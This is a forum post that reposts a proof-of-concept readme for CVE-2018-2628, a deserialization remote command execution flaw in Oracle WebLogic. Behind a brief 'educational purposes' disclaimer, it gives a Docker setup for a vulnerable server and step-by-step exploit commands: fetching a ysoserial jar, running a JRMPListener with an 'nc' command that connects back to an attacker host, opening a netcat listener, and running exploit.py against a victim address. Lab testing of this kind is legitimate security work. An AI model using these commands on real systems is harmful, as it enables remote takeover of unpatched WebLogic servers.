Nytro Posted April 22, 2018 Report Share Posted April 22, 2018 IMPORTANT: Is provided only for educational or information purposes. Description April 17, 2018, Oracle fixed a deserialization Remote Command Execution vulnerability (CVE-2018-2628) on Weblogic server WLS Core Components . Vulnerable: 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 Environment Run below commands to create a vulnerable Weblogic server (10.3.6.0): docker pull zhiqzhao/ubuntu_weblogic1036_domain docker run -d -p 7001:7001 zhiqzhao/ubuntu_weblogic1036_domain Reproduce Steps Run below commands on JRMPListener host: wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command] e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040' Start a listener on attacker host: nc -nlvp 4040 Run exploit script on attacker host: wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient] e.g. a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry) b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator) Reference http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html Sursa: https://github.com/brianwrf/CVE-2018-2628 Quote Link to comment Share on other sites More sharing options...
